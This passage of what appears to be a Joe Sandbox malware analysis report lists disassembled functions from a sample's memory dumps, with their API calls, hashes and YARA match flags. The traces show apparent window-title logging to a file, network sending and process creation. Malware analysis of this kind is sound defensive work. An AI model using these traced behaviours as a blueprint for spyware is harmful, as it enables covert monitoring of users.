                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00975C80
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00975B8C
                                                                                                    • Part of subcall function 00971280: __CxxThrowException@8.LIBCMT ref: 00971290
                                                                                                    • Part of subcall function 00971280: DeleteCriticalSection.KERNEL32(00000000,?,00987E78), ref: 009712A1
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 00975CF1
                                                                                                  • timeGetTime.WINMM ref: 00975CF7
                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00975D0B
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00975D14
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                  • String ID:
                                                                                                  • API String ID: 1400036169-0
                                                                                                  • Opcode ID: 6ca77892d63902de3580cfd9e544d55e589d35f0ba6be75ad084a8cfa0437d35
                                                                                                  • Instruction ID: 4107221a7ba5862b60ce6914c8ce52ac88442f3453ba83a9a8f86203654f8c9b
                                                                                                  • Opcode Fuzzy Hash: 6ca77892d63902de3580cfd9e544d55e589d35f0ba6be75ad084a8cfa0437d35
                                                                                                  • Instruction Fuzzy Hash: B9A1F3B1A05B46AFD354DF6AC88479AFBE8FB08304F50862EE12DC7640D774A964CF94
                                                                                                  Function 02D04CB0 Relevance: 16.7, APIs: 11, Instructions: 156COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetLastError.KERNEL32(0000139F,7A8163DF,?,?,?,?,00000000,000000FF,00000000), ref: 02D04CE6
                                                                                                  • EnterCriticalSection.KERNEL32(?,7A8163DF,?,?,?,?,00000000,000000FF,00000000), ref: 02D04D0D
                                                                                                  • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 02D04D21
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 02D04D28
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 2124651672-0
                                                                                                  • Opcode ID: 7406f71ce401349529a89e4309f619459d498eb0e14eea239b9f699805c8e011
                                                                                                  • Instruction ID: a694d45e6d585c61333239c79cd9b1c82a2625891c77e36baa21474dddb36c7f
                                                                                                  • Opcode Fuzzy Hash: 7406f71ce401349529a89e4309f619459d498eb0e14eea239b9f699805c8e011
                                                                                                  • Instruction Fuzzy Hash: B551B176A042008FC724DFA8E884B6AF7F5FF48710F104A2EE91A87780DB31AD14CB61
                                                                                                  Function 00974C90 Relevance: 16.7, APIs: 11, Instructions: 156COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetLastError.KERNEL32(0000139F,7E81BFB0,?,?,?,?,00000000,000000FF,00000000), ref: 00974CC6
                                                                                                  • EnterCriticalSection.KERNEL32(?,7E81BFB0,?,?,?,?,00000000,000000FF,00000000), ref: 00974CED
                                                                                                  • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 00974D01
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 00974D08
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 2124651672-0
                                                                                                  • Opcode ID: 043527515987b928737e2d6287a6768b294673c81e5d012542d4c715a1732649
                                                                                                  • Instruction ID: a6f814c27aa954dda0e4183d693d07380c945d660b4c8731deba7eb38193df04
                                                                                                  • Opcode Fuzzy Hash: 043527515987b928737e2d6287a6768b294673c81e5d012542d4c715a1732649
                                                                                                  • Instruction Fuzzy Hash: 9A51B076A08A049FC721DFA8D985B6AF7F4FF88710F00452EE51ADB781E775A804CB91
                                                                                                  Function 0282BD5F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_wcsrchr
                                                                                                  • String ID: D
                                                                                                  • API String ID: 170005318-2746444292
                                                                                                  • Opcode ID: f6fa0b72b56112bd3c35845102393e6f1842eb526f784eef978a12b58a365560
                                                                                                  • Instruction ID: e531b08741d91b78134d4556acc06fa49ff396bd85f70a9d27388ab6c83f06bd
                                                                                                  • Opcode Fuzzy Hash: f6fa0b72b56112bd3c35845102393e6f1842eb526f784eef978a12b58a365560
                                                                                                  • Instruction Fuzzy Hash: C951C37994032C7ADB20EB64CD85FEE73789F14704F404595E60DE6080EB70A688CFA6
                                                                                                  Function 03FB065B Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_wcsrchr
                                                                                                  • String ID: D
                                                                                                  • API String ID: 170005318-2746444292
                                                                                                  • Opcode ID: f6fa0b72b56112bd3c35845102393e6f1842eb526f784eef978a12b58a365560
                                                                                                  • Instruction ID: 7bfd9e739f20977fd8030510cee43583bdd3f500324afef1c7e9a294760c4bb2
                                                                                                  • Opcode Fuzzy Hash: f6fa0b72b56112bd3c35845102393e6f1842eb526f784eef978a12b58a365560
                                                                                                  • Instruction Fuzzy Hash: DA51C6F295031EAADB20FB61CD45FEB7378AF58700F404595E609AA080EB719794CBA6
                                                                                                  Function 02D0E730 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 74stringtimeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D0E751
                                                                                                  • GetForegroundWindow.USER32(?,76F923A0,00000000), ref: 02D0E759
                                                                                                  • GetWindowTextW.USER32(00000000,02D316F0,00000800), ref: 02D0E76F
                                                                                                  • _memset.LIBCMT ref: 02D0E78D
                                                                                                  • lstrlenW.KERNEL32(02D316F0,?,?,?,?,76F923A0,00000000), ref: 02D0E7AC
                                                                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,76F923A0,00000000), ref: 02D0E7BD
                                                                                                  • wsprintfW.USER32 ref: 02D0E804
                                                                                                    • Part of subcall function 02D0E6B0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,02D0E815,?,?,?,?,76F923A0,00000000), ref: 02D0E6BD
                                                                                                    • Part of subcall function 02D0E6B0: CreateFileW.KERNEL32(02D30D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,02D0E815,?,?,?,?,76F923A0,00000000), ref: 02D0E6D7
                                                                                                    • Part of subcall function 02D0E6B0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02D0E6F2
                                                                                                    • Part of subcall function 02D0E6B0: lstrlenW.KERNEL32(?,00000000,00000000), ref: 02D0E6FF
                                                                                                    • Part of subcall function 02D0E6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 02D0E70A
                                                                                                    • Part of subcall function 02D0E6B0: CloseHandle.KERNEL32(00000000), ref: 02D0E711
                                                                                                    • Part of subcall function 02D0E6B0: ReleaseMutex.KERNEL32(00000000), ref: 02D0E71E
                                                                                                  • _memset.LIBCMT ref: 02D0E820
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                                                                                  • String ID: [
                                                                                                  • API String ID: 2192163267-4056885943
                                                                                                  • Opcode ID: f2392b7f64f35ef2112b540acea0f629b271d8332d66a1d6e04b3f07457853d6
                                                                                                  • Instruction ID: b322ead35781cc88d6b4f6efec02c4da7187f21c14c934d25ff1ad5e4ad22b57
                                                                                                  • Opcode Fuzzy Hash: f2392b7f64f35ef2112b540acea0f629b271d8332d66a1d6e04b3f07457853d6
                                                                                                  • Instruction Fuzzy Hash: A121B171E40129A6E7609F90EC46BBA73BDFF44700F048599B889A2380DE709D99CFE4
                                                                                                  Function 028356E1 Relevance: 15.3, APIs: 10, Instructions: 269COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 02835703
                                                                                                    • Part of subcall function 0283881A: __mtinitlocknum.LIBCMT ref: 02838830
                                                                                                    • Part of subcall function 0283881A: __amsg_exit.LIBCMT ref: 0283883C
                                                                                                  • ____lc_codepage_func.LIBCMT ref: 0283574A
                                                                                                    • Part of subcall function 0283AAD7: __getptd.LIBCMT ref: 0283AAD7
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 0283576C
                                                                                                  • _free.LIBCMT ref: 028357A3
                                                                                                  • _strlen.LIBCMT ref: 028357AA
                                                                                                  • __malloc_crt.LIBCMT ref: 028357B1
                                                                                                  • _strlen.LIBCMT ref: 028357C7
                                                                                                  • _strcpy_s.LIBCMT ref: 028357D5
                                                                                                  • __invoke_watson.LIBCMT ref: 028357EA
                                                                                                  • _free.LIBCMT ref: 028357F9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_strlen$____lc_codepage_func__amsg_exit__getenv_helper_nolock__getptd__invoke_watson__lock__malloc_crt__mtinitlocknum_strcpy_s
                                                                                                  • String ID:
                                                                                                  • API String ID: 2128035972-0
                                                                                                  • Opcode ID: b058308d4fdfef1940e42f11e5b45edf41e2775cf3bd2bfbd0d08efe9f8df519
                                                                                                  • Instruction ID: 1bb0afbdc5138e617b0b64c1400278bd58c25dc8cf3a56da0cebb7ff4c0fa8b4
                                                                                                  • Opcode Fuzzy Hash: b058308d4fdfef1940e42f11e5b45edf41e2775cf3bd2bfbd0d08efe9f8df519
                                                                                                  • Instruction Fuzzy Hash: EB91847DC012599FDB23DFA8DC819ADBBFAEF09310B64002AE544EB250D7389941CF95
                                                                                                  Function 03FB9FDD Relevance: 15.3, APIs: 10, Instructions: 269COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 03FB9FFF
                                                                                                    • Part of subcall function 03FBD116: __mtinitlocknum.LIBCMT ref: 03FBD12C
                                                                                                    • Part of subcall function 03FBD116: __amsg_exit.LIBCMT ref: 03FBD138
                                                                                                  • ____lc_codepage_func.LIBCMT ref: 03FBA046
                                                                                                    • Part of subcall function 03FBF3D3: __getptd.LIBCMT ref: 03FBF3D3
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 03FBA068
                                                                                                  • _free.LIBCMT ref: 03FBA09F
                                                                                                  • _strlen.LIBCMT ref: 03FBA0A6
                                                                                                  • __malloc_crt.LIBCMT ref: 03FBA0AD
                                                                                                  • _strlen.LIBCMT ref: 03FBA0C3
                                                                                                  • _strcpy_s.LIBCMT ref: 03FBA0D1
                                                                                                  • __invoke_watson.LIBCMT ref: 03FBA0E6
                                                                                                  • _free.LIBCMT ref: 03FBA0F5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_strlen$____lc_codepage_func__amsg_exit__getenv_helper_nolock__getptd__invoke_watson__lock__malloc_crt__mtinitlocknum_strcpy_s
                                                                                                  • String ID:
                                                                                                  • API String ID: 2128035972-0
                                                                                                  • Opcode ID: b058308d4fdfef1940e42f11e5b45edf41e2775cf3bd2bfbd0d08efe9f8df519
                                                                                                  • Instruction ID: 4433998923b967bdb7d3ac224d7520d7399778e49f3e895a63a568da075b79cc
                                                                                                  • Opcode Fuzzy Hash: b058308d4fdfef1940e42f11e5b45edf41e2775cf3bd2bfbd0d08efe9f8df519
                                                                                                  • Instruction Fuzzy Hash: 199190F5D0425A9FDF21EFAACC819EDBBB9FF49210F18406AE550AB250D7358952CF20
                                                                                                  Function 02D03DE0 Relevance: 15.1, APIs: 10, Instructions: 117memorynetworkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,02D0398D,?,00000000,000000FF,00000000), ref: 02D03E05
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,02D0398D,?,00000000,000000FF,00000000), ref: 02D03E50
                                                                                                  • send.WS2_32(?,000000FF,00000000,00000000), ref: 02D03E6E
                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 02D03E81
                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 02D03E94
                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,02D0398D,?,00000000,000000FF,00000000), ref: 02D03EBC
                                                                                                  • WSAGetLastError.WS2_32(?,?,02D0398D,?,00000000,000000FF,00000000), ref: 02D03EC7
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,02D0398D,?,00000000,000000FF,00000000), ref: 02D03EDB
                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 02D03F14
                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?), ref: 02D03F51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                                                  • String ID:
                                                                                                  • API String ID: 1701177279-0
                                                                                                  • Opcode ID: 287b2bbc65bf0e6177d361b6ad58950ce21137de55a06bb817c37a29dabbae6a
                                                                                                  • Instruction ID: c2e325daacdbf53db90b838ba1475e95f0613bf2a10b7387482687871b8b1e4f
                                                                                                  • Opcode Fuzzy Hash: 287b2bbc65bf0e6177d361b6ad58950ce21137de55a06bb817c37a29dabbae6a
                                                                                                  • Instruction Fuzzy Hash: 7141F5715046019FC7648F78D9C8BA7B7F8AB49304F458AADE85ACB390D731E845CB60
                                                                                                  Function 02D04F30 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 02D04F63
                                                                                                  • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 02D04F78
                                                                                                  • WSASetLastError.WS2_32(00002746), ref: 02D04F8A
                                                                                                  • LeaveCriticalSection.KERNEL32(000002FF), ref: 02D04F91
                                                                                                  • timeGetTime.WINMM ref: 02D04FBF
                                                                                                  • timeGetTime.WINMM ref: 02D04FE7
                                                                                                  • SetEvent.KERNEL32(?), ref: 02D05025
                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D05031
                                                                                                  • LeaveCriticalSection.KERNEL32(000002FF), ref: 02D05038
                                                                                                  • LeaveCriticalSection.KERNEL32(000002FF), ref: 02D0504B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                  • String ID:
                                                                                                  • API String ID: 1979691958-0
                                                                                                  • Opcode ID: 82841c400f2053694ec0a4f2e9818c0db3b21d2ff48c31681c890e8391f8092c
                                                                                                  • Instruction ID: f9c61c30e6245ad7ac27219eb27136376b38a9f97f3b668a286682f2e597299e
                                                                                                  • Opcode Fuzzy Hash: 82841c400f2053694ec0a4f2e9818c0db3b21d2ff48c31681c890e8391f8092c
                                                                                                  • Instruction Fuzzy Hash: 6341E331A402008BC7309F68D988F6ABBE6FF48314F018959E98AC77E1E335EC54CB40
                                                                                                  Function 00974F10 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 00974F43
                                                                                                  • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 00974F58
                                                                                                  • WSASetLastError.WS2_32(00002746), ref: 00974F6A
                                                                                                  • LeaveCriticalSection.KERNEL32(000002FF), ref: 00974F71
                                                                                                  • timeGetTime.WINMM ref: 00974F9F
                                                                                                  • timeGetTime.WINMM ref: 00974FC7
                                                                                                  • SetEvent.KERNEL32(?), ref: 00975005
                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 00975011
                                                                                                  • LeaveCriticalSection.KERNEL32(000002FF), ref: 00975018
                                                                                                  • LeaveCriticalSection.KERNEL32(000002FF), ref: 0097502B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                  • String ID:
                                                                                                  • API String ID: 1979691958-0
                                                                                                  • Opcode ID: 418c7f6623d9ab7a32092d9b51cb10cd27355b97d52f8ea64e355d6d2f897b3a
                                                                                                  • Instruction ID: dcf66b6b58c709fbe2a66862f44f01d2d6f88855ec7a9772d31284a95aabe956
                                                                                                  • Opcode Fuzzy Hash: 418c7f6623d9ab7a32092d9b51cb10cd27355b97d52f8ea64e355d6d2f897b3a
                                                                                                  • Instruction Fuzzy Hash: 0E410032604A009FD720DF69D988B6AB7E9FF48310F158599E88ECB352E775E844CB81
                                                                                                  Function 02D0C270 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98filestringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D0C2AE
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 02D0C2CC
                                                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02D0C309
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D0C314
                                                                                                  • lstrlenW.KERNEL32(?), ref: 02D0C321
                                                                                                  • wsprintfW.USER32 ref: 02D0C345
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
                                                                                                  • String ID: %s %s
                                                                                                  • API String ID: 1326869720-2939940506
                                                                                                  • Opcode ID: 38ab7c1ef4b9d8123fa412a5ca342cc86060a920dc77085160d2eee4f53fb6fb
                                                                                                  • Instruction ID: 6efcd0301c1111316b0bef5c2cf8b7e1120ce6f85a34b43f331dbb227f733d74
                                                                                                  • Opcode Fuzzy Hash: 38ab7c1ef4b9d8123fa412a5ca342cc86060a920dc77085160d2eee4f53fb6fb
                                                                                                  • Instruction Fuzzy Hash: 3A31D532A502186BDB34DB64DC89FEF7378FB54311F40469ABA46A62C0DB305E48CFA4
                                                                                                  Function 02D0C980 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88processstringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32(?), ref: 02D0C98D
                                                                                                  • _wcsrchr.LIBCMT ref: 02D0C9C7
                                                                                                    • Part of subcall function 02D07C80: LoadLibraryW.KERNEL32(wininet.dll), ref: 02D07CC3
                                                                                                    • Part of subcall function 02D07C80: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 02D07CD7
                                                                                                    • Part of subcall function 02D07C80: FreeLibrary.KERNEL32(00000000), ref: 02D07CF7
                                                                                                  • GetFileAttributesW.KERNEL32(-00000002), ref: 02D0C9E6
                                                                                                  • GetLastError.KERNEL32 ref: 02D0C9F1
                                                                                                  • _memset.LIBCMT ref: 02D0CA04
                                                                                                  • CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 02D0CA31
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memset_wcsrchrlstrlen
                                                                                                  • String ID: D$WinSta0\Default
                                                                                                  • API String ID: 174883095-1101385590
                                                                                                  • Opcode ID: c9c60bc4db5109d555a470ca776a722498d07bcee4b19498663d4550f319b86a
                                                                                                  • Instruction ID: 0675967e2c46afb4d49c093d2e956d828239db6d9f2d85b7d25031a405572a12
                                                                                                  • Opcode Fuzzy Hash: c9c60bc4db5109d555a470ca776a722498d07bcee4b19498663d4550f319b86a
                                                                                                  • Instruction Fuzzy Hash: 8A112BB290010437D720E6A5AC8AFAFB76DDF94710F040126FE059A3D0EB359D09C6F1
                                                                                                  Function 02D08159 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 58stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • lstrcmpiW.KERNEL32(?,A:\), ref: 02D08166
                                                                                                  • lstrcmpiW.KERNEL32(?,B:\), ref: 02D08176
                                                                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 02D081A6
                                                                                                  • lstrlenW.KERNEL32(?), ref: 02D081B7
                                                                                                  • __wcsnicmp.LIBCMT ref: 02D081CE
                                                                                                  • lstrcpyW.KERNEL32(00000AD4,?), ref: 02D08204
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 02D08228
                                                                                                  • lstrcatW.KERNEL32(?,00000000), ref: 02D08233
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
                                                                                                  • String ID: A:\$B:\
                                                                                                  • API String ID: 4249875308-1009255891
                                                                                                  • Opcode ID: 6501c81d47d97fcb9e13dcb6f80e32bf17d48db7f1c46b54ffbb0f12bfe5cca4
                                                                                                  • Instruction ID: 5dbf9bd1804ac554d6c78854c3c027d6c88f4abcc194eb897272cf696089ae29
                                                                                                  • Opcode Fuzzy Hash: 6501c81d47d97fcb9e13dcb6f80e32bf17d48db7f1c46b54ffbb0f12bfe5cca4
                                                                                                  • Instruction Fuzzy Hash: 54114271E412289ADB349F60DD84BAE7379EF54314F014498EE0AA3240E7749E19CB95
                                                                                                  Function 02824DEF Relevance: 13.9, APIs: 9, Instructions: 440COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _strcat_s$_memset$__localtime64__time64__wcsnicmp_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 3592133475-0
                                                                                                  • Opcode ID: 9612d8c1e5366324d8b9188000d87f817137c3975bf1db378519ae119bbab18c
                                                                                                  • Instruction ID: c37b20005270fd4bea5008af3d5dc5d296092ff58590bc701196d04a0df6bbac
                                                                                                  • Opcode Fuzzy Hash: 9612d8c1e5366324d8b9188000d87f817137c3975bf1db378519ae119bbab18c
                                                                                                  • Instruction Fuzzy Hash: 7DF1B6B9940224AFD724DBA4CC85FDA73B9EF48300F404558E70EE7281EB75AA89CF55
                                                                                                  Function 03FA96EB Relevance: 13.9, APIs: 9, Instructions: 440COMMON
                                                                                                  Download Yara Rule
